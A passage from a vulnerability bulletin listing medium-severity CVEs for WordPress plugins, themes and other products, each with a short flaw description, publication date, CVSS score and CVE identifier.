Missing Authorization vulnerability in PressTigers Simple Job Board allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Job Board: from n/a through 2.10.5. | 2025-01-02 | 5.3 | CVE-2023-47188 |
| PriceListo--Best Restaurant Menu by PriceListo |
Missing Authorization vulnerability in PriceListo Best Restaurant Menu by PriceListo.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.4.2. | 2024-12-31 | 4.3 | CVE-2024-49698 |
| Progress Software Corporation--WhatsUp Gold |
In WhatsUp Gold versions released before 2024.0.2, an authenticated user can use a specially crafted HTTP request that can lead to information disclosure. | 2024-12-31 | 6.5 | CVE-2024-12105 |
| Pronamic--Pronamic Google Maps |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pronamic Pronamic Google Maps allows Stored XSS.This issue affects Pronamic Google Maps: from n/a through 2.3.2. | 2025-01-02 | 6.5 | CVE-2024-56240 |
| Provision-ISR--SH-4050A-2 |
A vulnerability was found in Provision-ISR SH-4050A-2, SH-4100A-2L(MM), SH-8100A-2L(MM), SH-16200A-2(1U), SH-16200A-5(1U) and NVR5-8200PX up to 20241220. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /server.js. The manipulation leads to information disclosure. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 5.3 | CVE-2025-0224 |
| Putler / Storeapps--Putler Connector for WooCommerce |
Missing Authorization vulnerability in Putler / Storeapps Putler Connector for WooCommerce.This issue affects Putler Connector for WooCommerce: from n/a through 2.12.0. | 2025-01-02 | 6.5 | CVE-2023-40327 |
| quillforms.com--Quill Forms |
Missing Authorization vulnerability in quillforms.com Quill Forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Quill Forms: from n/a through 3.3.0. | 2025-01-02 | 6.5 | CVE-2023-46610 |
| QunatumCloud--Floating Action Buttons |
Missing Authorization vulnerability in QunatumCloud Floating Action Buttons allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Floating Action Buttons: from n/a through 0.9.1. | 2025-01-02 | 5.3 | CVE-2024-56238 |
| Rara Theme--Benevolent |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Benevolent allows Cross Site Request Forgery.This issue affects Benevolent: from n/a through 1.3.4. | 2025-01-02 | 4.3 | CVE-2024-37450 |
| Rara Theme--Chic Lite |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Chic Lite allows Cross Site Request Forgery.This issue affects Chic Lite: from n/a through 1.1.3. | 2025-01-02 | 4.3 | CVE-2024-37104 |
| Rara Theme--Construction Landing Page |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Construction Landing Page allows Cross Site Request Forgery.This issue affects Construction Landing Page: from n/a through 1.3.5. | 2025-01-02 | 4.3 | CVE-2024-37508 |
| Rara Theme--Education Zone |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Education Zone allows Cross Site Request Forgery.This issue affects Education Zone: from n/a through 1.3.4. | 2025-01-02 | 4.3 | CVE-2024-37103 |
| Rara Theme--Elegant Pink |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Elegant Pink allows Cross Site Request Forgery.This issue affects Elegant Pink: from n/a through 1.3.0. | 2025-01-02 | 4.3 | CVE-2024-37426 |
| Rara Theme--JobScout |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme JobScout allows Cross Site Request Forgery.This issue affects JobScout: from n/a through 1.1.4. | 2025-01-02 | 4.3 | CVE-2024-37421 |
| Rara Theme--Lawyer Landing Page |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Lawyer Landing Page allows Cross Site Request Forgery.This issue affects Lawyer Landing Page: from n/a through 1.2.4. | 2025-01-02 | 4.3 | CVE-2024-37503 |
| Rara Theme--Perfect Portfolio |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Perfect Portfolio allows Cross Site Request Forgery.This issue affects Perfect Portfolio: from n/a through 1.2.0. | 2025-01-02 | 4.3 | CVE-2024-37435 |
| Rara Theme--Preschool and Kindergarten |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Preschool and Kindergarten allows Cross Site Request Forgery.This issue affects Preschool and Kindergarten: from n/a through 1.2.1. | 2025-01-02 | 4.3 | CVE-2024-37413 |
| Rara Theme--Rara Business |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Rara Business allows Cross Site Request Forgery.This issue affects Rara Business: from n/a through 1.2.5. | 2025-01-02 | 4.3 | CVE-2024-37937 |
| Rara Theme--Travel Agency |
Cross-Site Request Forgery (CSRF) vulnerability in Rara Theme Travel Agency allows Cross Site Request Forgery.This issue affects Travel Agency: from n/a through 1.4.9. | 2025-01-02 | 4.3 | CVE-2024-37451 |
| Red Hat--Red Hat Fuse 7 |
A flaw was found in FFmpeg's TTY Demuxer. This vulnerability allows possible data exfiltration via improper parsing of non-TTY-compliant input files in HLS playlists. | 2024-12-31 | 5.3 | CVE-2023-6602 |
| Red Hat--Red Hat Fuse 7 |
A security issue was discovered in the LRA Coordinator component of Narayana. When Cancel is called in LRA, an execution time of approximately 2 seconds occurs. If Join is called with the same LRA ID within that timeframe, the application may crash or hang indefinitely, leading to a denial of service. | 2025-01-02 | 5.9 | CVE-2024-8447 |
| RedLettuce Plugins--WP Word Count |
Missing Authorization vulnerability in RedLettuce Plugins WP Word Count allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Word Count: from n/a through 3.2.4. | 2025-01-02 | 4.3 | CVE-2023-46628 |
| Repuso--Social proof testimonials and reviews by Repuso |
Missing Authorization vulnerability in Repuso Social proof testimonials and reviews by Repuso allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Social proof testimonials and reviews by Repuso: from n/a through 4.97. | 2025-01-02 | 4.3 | CVE-2023-46196 |
| Repute InfoSystems--ARMember Premium |
Missing Authorization vulnerability in Repute InfoSystems ARMember Premium allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ARMember Premium: from n/a through 5.9.2. | 2025-01-02 | 4.3 | CVE-2023-39994 |
| RevenueHunt--Product Recommendation Quiz for eCommerce |
Missing Authorization vulnerability in RevenueHunt Product Recommendation Quiz for eCommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Recommendation Quiz for eCommerce: from n/a through 2.1.2. | 2025-01-02 | 6.5 | CVE-2023-46631 |
| RumbleTalk Ltd--RumbleTalk Live Group Chat |
Missing Authorization vulnerability in RumbleTalk Ltd RumbleTalk Live Group Chat allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects RumbleTalk Live Group Chat: from n/a through 6.2.5. | 2025-01-02 | 5.4 | CVE-2023-45828 |
| Ruslan Suhar--Convertful Your Ultimate On-Site Conversion Tool |
Missing Authorization vulnerability in Ruslan Suhar Convertful - Your Ultimate On-Site Conversion Tool allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Convertful - Your Ultimate On-Site Conversion Tool: from n/a through 2.5. | 2025-01-02 | 5.3 | CVE-2023-46605 |
| Samsung Mobile--Samsung Mobile Devices |
Protection Mechanism Failure in bootloader prior to SMR Oct-2024 Release 1 allows physical attackers to reset lockscreen failure count by hardware fault injection. User interaction is required for triggering this vulnerability. | 2024-12-31 | 5.2 | CVE-2024-49422 |
| Saurav Sharma--Generate Dummy Posts |
Missing Authorization vulnerability in Saurav Sharma Generate Dummy Posts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Generate Dummy Posts: from n/a through 1.0.0. | 2025-01-02 | 5.3 | CVE-2023-46637 |
| Schema App--Schema App Structured Data |
Missing Authorization vulnerability in Schema App Schema App Structured Data allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Schema App Structured Data: from n/a through 1.23.1. | 2025-01-02 | 5.3 | CVE-2023-44258 |
| Searchiq--SearchIQ |
Cross-Site Request Forgery (CSRF) vulnerability in Searchiq SearchIQ.This issue affects SearchIQ: from n/a through 4.6. | 2024-12-31 | 4.3 | CVE-2024-56229 |
| Seers--Seers |
Missing Authorization vulnerability in Seers Seers allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Seers: from n/a through 8.1.1. | 2025-01-02 | 5.3 | CVE-2023-47515 |
| SKT Themes--Posterity |
Cross-Site Request Forgery (CSRF) vulnerability in SKT Themes Posterity allows Cross Site Request Forgery.This issue affects Posterity: from n/a through 3.3. | 2025-01-02 | 4.3 | CVE-2024-37493 |
| smartersite--WP Compress Instant Performance & Speed Optimization |
The WP Compress - Instant Performance & Speed Optimization plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'custom_server' parameter in all versions up to, and including, 6.30.03 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-04 | 6.1 | CVE-2024-12047 |
| Smartsupp--Smartsupp live chat, chatbots, AI and lead generation |
Cross-Site Request Forgery (CSRF) vulnerability in Smartsupp Smartsupp - live chat, chatbots, AI and lead generation allows Cross Site Request Forgery.This issue affects Smartsupp - live chat, chatbots, AI and lead generation: from n/a through 3.6. | 2025-01-02 | 6.5 | CVE-2024-38790 |
| Sonaar Music--MP3 Audio Player for Music, Radio & Podcast by Sonaar |
Missing Authorization vulnerability in Sonaar Music MP3 Audio Player for Music, Radio & Podcast by Sonaar allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects MP3 Audio Player for Music, Radio & Podcast by Sonaar: from n/a through 5.8. | 2025-01-02 | 6.3 | CVE-2024-56266 |
| SourceCodester--Online Eyewear Shop |
A vulnerability was found in SourceCodester Online Eyewear Shop 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /orders/view_order.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-02 | 6.3 | CVE-2025-0173 |
| Stephen Sherrard--Member Directory and Contact Form |
Missing Authorization vulnerability in Stephen Sherrard Member Directory and Contact Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Member Directory and Contact Form: from n/a through 1.7.0. | 2024-12-31 | 4.3 | CVE-2024-56215 |
| StoreApps--Smart Manager |
Missing Authorization vulnerability in StoreApps Smart Manager.This issue affects Smart Manager: from n/a through 8.45.0. | 2024-12-31 | 4.3 | CVE-2024-49687 |
| StorePlugin--ShopElement |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StorePlugin ShopElement allows Stored XSS.This issue affects ShopElement: from n/a through 2.0.0. | 2025-01-02 | 6.5 | CVE-2024-56260 |
| StylemixThemes--MasterStudy LMS |
Cross-Site Request Forgery (CSRF) vulnerability in StylemixThemes MasterStudy LMS allows Cross Site Request Forgery.This issue affects MasterStudy LMS: from n/a through 3.2.1. | 2025-01-02 | 4.3 | CVE-2024-37093 |
| supsystic.com--Data Tables Generator by Supsystic |
Missing Authorization vulnerability in supsystic.com Data Tables Generator by Supsystic allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Data Tables Generator by Supsystic: from n/a through 1.10.36. | 2025-01-02 | 5.4 | CVE-2024-56253 |
| SWTE--Swift Performance Lite |
Cross-Site Request Forgery (CSRF) vulnerability in SWTE Swift Performance Lite allows Cross Site Request Forgery.This issue affects Swift Performance Lite: from n/a through 2.3.6.20. | 2025-01-02 | 4.3 | CVE-2024-37511 |
| Tagbox--Taggbox |
Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Taggbox allows Cross Site Request Forgery.This issue affects Taggbox: from n/a through 3.3. | 2025-01-02 | 4.3 | CVE-2024-38754 |
| taskbuilder--Taskbuilder WordPress Project & Task Management plugin |
The Taskbuilder - WordPress Project & Task Management plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wppm_tasks shortcode in all versions up to, and including, 3.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-04 | 6.4 | CVE-2024-11930 |
| TCBarrett--Glossary |
Missing Authorization vulnerability in TCBarrett Glossary allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Glossary: from n/a through 3.1.2. | 2025-01-02 | 5.4 | CVE-2023-46633 |
| TCS--BaNCS |
A vulnerability was found in TCS BaNCS 10. It has been classified as problematic. This affects an unknown part of the file /REPORTS/REPORTS_SHOW_FILE.jsp. The manipulation of the argument FilePath leads to file inclusion. | 2025-01-04 | 5.5 | CVE-2025-0202 |
| TeamPass--TeamPass |
TeamPass before 3.1.3.1 does not properly check whether a mail_me (aka action_mail) operation is on behalf of an administrator or manager. | 2024-12-30 | 5.4 | CVE-2024-50702 |
| TeamPass--TeamPass |
TeamPass before 3.1.3.1 does not properly prevent a user from acting with the privileges of a different user_id. | 2024-12-30 | 5.4 | CVE-2024-50703 |
| TeamPass--TeamPass |
TeamPass before 3.1.3.1, when retrieving information about access rights for a folder, does not properly check whether a folder is in a user's allowed folders list that has been defined by an admin. | 2024-12-30 | 4.3 | CVE-2024-50701 |
| The Events Calendar--Event Tickets |
Cross-Site Request Forgery (CSRF) vulnerability in The Events Calendar Event Tickets allows Cross Site Request Forgery.This issue affects Event Tickets: from n/a through 5.11.0.4. | 2025-01-02 | 4.3 | CVE-2024-38762 |
| The Events Calendar--The Events Calendar |
Cross-Site Request Forgery (CSRF) vulnerability in The Events Calendar The Events Calendar allows Cross Site Request Forgery.This issue affects The Events Calendar: from n/a through 6.5.1.4. | 2025-01-02 | 4.3 | CVE-2024-37518 |
| ThemeIsle--Hestia |
Cross-Site Request Forgery (CSRF) vulnerability in ThemeIsle Hestia allows Cross Site Request Forgery.This issue affects Hestia: from n/a through 3.1.2. | 2025-01-02 | 4.3 | CVE-2024-37467 |
| ThemeLooks--Enter Addons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeLooks Enter Addons allows Stored XSS.This issue affects Enter Addons: from n/a through 2.1.9. | 2025-01-02 | 6.5 | CVE-2024-56252 |
| Themes4WP--Popularis Verse |
Cross-Site Request Forgery (CSRF) vulnerability in Themes4WP Popularis Verse allows Cross Site Request Forgery.This issue affects Popularis Verse: from n/a through 1.1.1. | 2025-01-02 | 4.3 | CVE-2024-38763 |
| Themewinter--Eventin |
Path Traversal: '.../...//' vulnerability in Themewinter Eventin allows Path Traversal.This issue affects Eventin: from n/a through 4.0.7. | 2024-12-31 | 6.5 | CVE-2024-56213 |
| Themify--Themify Audio Dock |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themify Themify Audio Dock allows Stored XSS.This issue affects Themify Audio Dock: from n/a through 2.0.4. | 2025-01-02 | 6.5 | CVE-2024-56239 |
| Themify--Themify Builder |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Themify Themify Builder allows PHP Local File Inclusion.This issue affects Themify Builder: from n/a through 7.6.3. | 2024-12-31 | 6.5 | CVE-2024-56216 |
| thorsten--phpMyFAQ |
phpMyFAQ is an open source FAQ web application. Starting no later than version 3.2.10 and prior to version 4.0.2, an attacker can inject malicious HTML content into the FAQ editor at `http[:]//localhost/admin/index[.]php?action=editentry`, resulting in a complete disruption of the FAQ page's user interface. By injecting malformed HTML elements styled to cover the entire screen, an attacker can render the page unusable. This injection manipulates the page structure by introducing overlapping buttons, images, and iframes, breaking the intended layout and functionality. Exploiting this issue can lead to Denial of Service for legitimate users, damage to the user experience, and potential abuse in phishing or defacement attacks. Version 4.0.2 contains a patch for the vulnerability. | 2025-01-02 | 5.2 | CVE-2024-56199 |
| Tiki Wiki--CMS |
Tiki Wiki CMS - CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) | 2024-12-30 | 6.1 | CVE-2024-47918 |
| Till Krss--Email Address Encoder |
Cross-Site Request Forgery (CSRF) vulnerability in Till Krüss Email Address Encoder allows Cross Site Request Forgery.This issue affects Email Address Encoder: from n/a through 1.0.23. | 2025-01-02 | 4.3 | CVE-2024-43927 |
| Tim Whitlock--Loco Translate |
Cross-Site Request Forgery (CSRF) vulnerability in Tim Whitlock Loco Translate allows Cross Site Request Forgery.This issue affects Loco Translate: from n/a through 2.6.9. | 2025-01-02 | 4.3 | CVE-2024-37236 |
| TMD--Custom Header Menu |
A vulnerability was found in TMD Custom Header Menu 4.0.0.1 on OpenCart. It has been rated as problematic. This issue affects some unknown processing of the file /admin/index.php. The manipulation of the argument headermenu_id leads to sql injection. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. | 2025-01-04 | 4.1 | CVE-2025-0214 |
| Toast Plugins--Animator |
Missing Authorization vulnerability in Toast Plugins Animator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Animator: from n/a through 3.0.10. | 2025-01-02 | 6.5 | CVE-2023-47689 |
| Torod Holding LTD--Torod |
Missing Authorization vulnerability in Torod Holding LTD Torod allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Torod: from n/a through 1.7. | 2024-12-31 | 6.5 | CVE-2024-55995 |
| Trend Micro, Inc.--Trend Micro Deep Security |
An incorrect permissions assignment vulnerability in Trend Micro Deep Security 20.0 agents between versions 20.0.1-9400 and 20.0.1-23340 could allow a local attacker to escalate privileges on affected installations. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. | 2024-12-31 | 6.7 | CVE-2024-55955 |
| Trend Micro, Inc.--Trend Micro ID Security |
Trend Micro ID Security, version 3.0 and below contains a vulnerability that could allow an attacker to send an unlimited number of email verification requests without any restriction, potentially leading to abuse or denial of service. | 2024-12-31 | 6.5 | CVE-2024-53647 |
| Tsinghua Unigroup--Electronic Archives Management System |
A vulnerability was found in Tsinghua Unigroup Electronic Archives Management System 3.2.210802(62532). It has been classified as problematic. Affected is the function download of the file /Searchnew/Subject/download.html. The manipulation of the argument path leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-30 | 4.3 | CVE-2024-13042 |
| Tsinghua Unigroup--Electronic Archives System |
A vulnerability classified as problematic was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this vulnerability is an unknown functionality of the file /setting/ClassFy/exampleDownload.html. The manipulation of the argument name leads to path traversal: '/../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 4.3 | CVE-2025-0225 |
| Tsinghua Unigroup--Electronic Archives System |
A vulnerability, which was classified as problematic, has been found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this issue is the function download of the file /collect/PortV4/downLoad.html. The manipulation of the argument path leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 4.3 | CVE-2025-0226 |
| Tsinghua Unigroup--Electronic Archives System |
A vulnerability, which was classified as problematic, was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). This affects an unknown part of the file /Logs/Annals/downLoad.html. The manipulation of the argument path leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 4.3 | CVE-2025-0227 |
| Tyche Softwares--Arconix Shortcodes |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tyche Softwares Arconix Shortcodes allows Stored XSS.This issue affects Arconix Shortcodes: from n/a through 2.1.14. | 2025-01-02 | 6.5 | CVE-2024-56242 |
| Uncanny Owl--Uncanny Toolkit Pro for LearnDash |
Cross-Site Request Forgery (CSRF) vulnerability in Uncanny Owl Uncanny Toolkit Pro for LearnDash allows Cross Site Request Forgery.This issue affects Uncanny Toolkit Pro for LearnDash: from n/a before 4.1.4.1. | 2025-01-02 | 5.4 | CVE-2024-37438 |
| Unknown--TravelTour |
The does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin | 2025-01-01 | 6.1 | CVE-2024-11846 |
| vercel--next.js |
Next.js is a React framework for building full-stack web applications. Starting in version 13.0.0 and prior to versions 13.5.8, 14.2.21, and 15.1.2, Next.js is vulnerable to a Denial of Service (DoS) attack that allows attackers to construct requests that leaves requests to Server Actions hanging until the hosting provider cancels the function execution. This vulnerability can also be used as a Denial of Wallet (DoW) attack when deployed in providers billing by response times. (Note: Next.js server is idle during that time and only keeps the connection open. CPU and memory footprint are low during that time.). Deployments without any protection against long running Server Action invocations are especially vulnerable. Hosting providers like Vercel or Netlify set a default maximum duration on function execution to reduce the risk of excessive billing. This is the same issue as if the incoming HTTP request has an invalid `Content-Length` header or never closes. If the host has no other mitigations to those then this vulnerability is novel. This vulnerability affects only Next.js deployments using Server Actions. The issue was resolved in Next.js 13.5.8, 14.2.21, and 15.1.2. We recommend that users upgrade to a safe version. There are no official workarounds. | 2025-01-03 | 5.3 | CVE-2024-56332 |
| Veritas--Data Insight |
Veritas / Arctera Data Insight before 7.1.1 allows Application Administrators to conduct SQL injection attacks. | 2024-12-30 | 6.5 | CVE-2024-46542 |
| VolThemes--Patricia Blog |
Cross-Site Request Forgery (CSRF) vulnerability in VolThemes Patricia Blog allows Cross Site Request Forgery.This issue affects Patricia Blog: from n/a through 1.2. | 2025-01-02 | 4.3 | CVE-2024-38732 |
| VW THEMES--VW Automobile Lite |
Missing Authorization vulnerability in VW THEMES VW Automobile Lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Automobile Lite: from n/a through 2.1. | 2024-12-31 | 5.4 | CVE-2024-56234 |
| W3 Eden, Inc.--Download Manager |
Missing Authorization vulnerability in W3 Eden, Inc. Download Manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download Manager: from n/a through 3.3.03. | 2024-12-31 | 4.3 | CVE-2024-56217 |
| wangl1989--mysiteforme |
A vulnerability was found in wangl1989 mysiteforme 1.0 and classified as critical. Affected by this issue is the function rememberMeManager of the file src/main/java/com/mysiteforme/admin/config/ShiroConfig.java. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2024-13136 |
| wangl1989--mysiteforme |
A vulnerability was found in wangl1989 mysiteforme 1.0. It has been rated as critical. This issue affects the function doContent of the file src/main/java/com/mysiteform/admin/controller/system/FileController. The manipulation of the argument content leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 6.3 | CVE-2024-13139 |
| wangl1989--mysiteforme |
A vulnerability was found in wangl1989 mysiteforme 1.0. It has been declared as critical. This vulnerability affects the function upload of the file src/main/java/com/mysiteform/admin/service/ipl/LocalUploadServiceImpl. The manipulation of the argument test leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-05 | 4.7 | CVE-2024-13138 |
| Webdeclic--WPMasterToolKit |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Webdeclic WPMasterToolKit allows Path Traversal.This issue affects WPMasterToolKit: from n/a through 1.13.1. | 2025-01-02 | 4.9 | CVE-2024-56248 |
| websoudan--MW WP Form |
Missing Authorization vulnerability in websoudan MW WP Form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MW WP Form: from n/a through 4.4.5. | 2025-01-02 | 5.3 | CVE-2023-46206 |
| WebToffee--WordPress Backup & Migration |
Missing Authorization vulnerability in WebToffee WordPress Backup & Migration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress Backup & Migration: from n/a through 1.4.1. | 2025-01-02 | 5.4 | CVE-2023-45636 |
| weDevs--WP ERP |
Missing Authorization vulnerability in weDevs WP ERP allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP ERP: from n/a through 1.12.6. | 2025-01-02 | 4.3 | CVE-2023-45765 |
| wedevs--WP Project Manager Task, team, and project management plugin featuring kanban board and gantt charts |
The WP Project Manager - Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to SQL Injection via the 'project_id' parameter of the /wp-json/pm/v2/projects/2/task-lists REST API endpoint in all versions up to, and including, 2.6.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, who have been granted access to a project, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-04 | 6.5 | CVE-2024-12195 |
| weDevs--WP User Frontend |
Missing Authorization vulnerability in weDevs WP User Frontend allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP User Frontend: from n/a through 3.6.8. | 2025-01-02 | 4.3 | CVE-2023-45002 |
| WeyHan Ng--Post Teaser |
Missing Authorization vulnerability in WeyHan Ng Post Teaser.This issue affects Post Teaser: from n/a through 4.1.5. | 2025-01-02 | 5.4 | CVE-2022-45811 |
| Woo--WooCommerce Subscriptions |
Missing Authorization vulnerability in Woo WooCommerce Subscriptions allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Subscriptions: from n/a before 5.8.0. | 2024-12-31 | 4.3 | CVE-2023-50850 |
| WowStore Team--ProductX Gutenberg WooCommerce Blocks |
Missing Authorization vulnerability in WowStore Team ProductX - Gutenberg WooCommerce Blocks allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ProductX - Gutenberg WooCommerce Blocks: from n/a through 2.7.8. | 2025-01-02 | 4.3 | CVE-2023-45271 |
| WP CTA PRO--WordPress CTA |
Missing Authorization vulnerability in WP CTA PRO WordPress CTA allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress CTA: from n/a through 1.5.8. | 2025-01-02 | 6.5 | CVE-2023-46644 |
| WP Hait--Post Grid Elementor Addon |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Hait Post Grid Elementor Addon allows Stored XSS.This issue affects Post Grid Elementor Addon: from n/a through 2.0.18. | 2025-01-02 | 6.5 | CVE-2024-56268 |
| WP iCal Availability--WP iCal Availability |
Missing Authorization vulnerability in WP iCal Availability WP iCal Availability allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP iCal Availability: from n/a through 1.0.3. | 2025-01-02 | 5.4 | CVE-2023-46607 |
| WP Royal--Ashe Extra |
Missing Authorization vulnerability in WP Royal Ashe Extra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ashe Extra: from n/a through 1.2.9. | 2025-01-02 | 5.4 | CVE-2023-46079 |
| WP Royal--Ashe Extra |
Missing Authorization vulnerability in WP Royal Ashe Extra allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ashe Extra: from n/a through 1.2.92. | 2025-01-02 | 5.4 | CVE-2024-56244 |
| WP Royal--Ashe |
Cross-Site Request Forgery (CSRF) vulnerability in WP Royal Ashe allows Cross Site Request Forgery.This issue affects Ashe: from n/a through 2.233. | 2025-01-02 | 4.3 | CVE-2024-37478 |
| WP Royal--Bard |
Cross-Site Request Forgery (CSRF) vulnerability in WP Royal Bard allows Cross Site Request Forgery.This issue affects Bard: from n/a through 2.210. | 2025-01-02 | 4.3 | CVE-2024-37490 |
| WP Royal--Royal Elementor Addons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Royal Royal Elementor Addons allows Stored XSS.This issue affects Royal Elementor Addons: from n/a through 1.3.987. | 2024-12-31 | 6.5 | CVE-2024-56062 |
| WP Royal--Royal Elementor Addons |
Missing Authorization vulnerability in WP Royal Royal Elementor Addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Royal Elementor Addons: from n/a through 1.7.1001. | 2024-12-31 | 4.3 | CVE-2024-56227 |
| WP Travel Engine--Travel Monster |
Cross-Site Request Forgery (CSRF) vulnerability in WP Travel Engine Travel Monster allows Cross Site Request Forgery.This issue affects Travel Monster: from n/a through 1.1.2. | 2025-01-02 | 4.3 | CVE-2024-37272 |
| wp-buy--Visitors Traffic Real Time Statistics |
Missing Authorization vulnerability in wp-buy Visitors Traffic Real Time Statistics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Visitors Traffic Real Time Statistics: from n/a through 7.2. | 2025-01-02 | 4.3 | CVE-2023-47557 |
| WP-CRM--WP-CRM System |
Missing Authorization vulnerability in WP-CRM WP-CRM System allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP-CRM System: from n/a through 3.2.9.1. | 2024-12-31 | 6.5 | CVE-2024-55991 |
| WPBlockArt--Magazine Blocks |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPBlockArt Magazine Blocks allows Stored XSS.This issue affects Magazine Blocks: from n/a through 1.3.20. | 2025-01-02 | 6.5 | CVE-2024-56258 |
| wpdevart--Responsive Image Gallery, Gallery Album |
Missing Authorization vulnerability in wpdevart Responsive Image Gallery, Gallery Album allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Responsive Image Gallery, Gallery Album: from n/a through 2.0.3. | 2025-01-02 | 4.3 | CVE-2023-45631 |
| WPDeveloper--Essential Addons for Elementor |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Essential Addons for Elementor allows Stored XSS.This issue affects Essential Addons for Elementor: from n/a through 6.0.7. | 2024-12-31 | 6.5 | CVE-2024-56063 |
| WPDO--DoLogin Security |
Missing Authorization vulnerability in WPDO DoLogin Security allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects DoLogin Security: from n/a through 3.7.1. | 2025-01-02 | 5.3 | CVE-2023-46608 |
| wpexpertsio--WP Multi Store Locator |
The WP Multi Store Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-04 | 6.4 | CVE-2024-12475 |
| wpjobportal--WP Job Portal A Complete Recruitment System for Company or Job Board website |
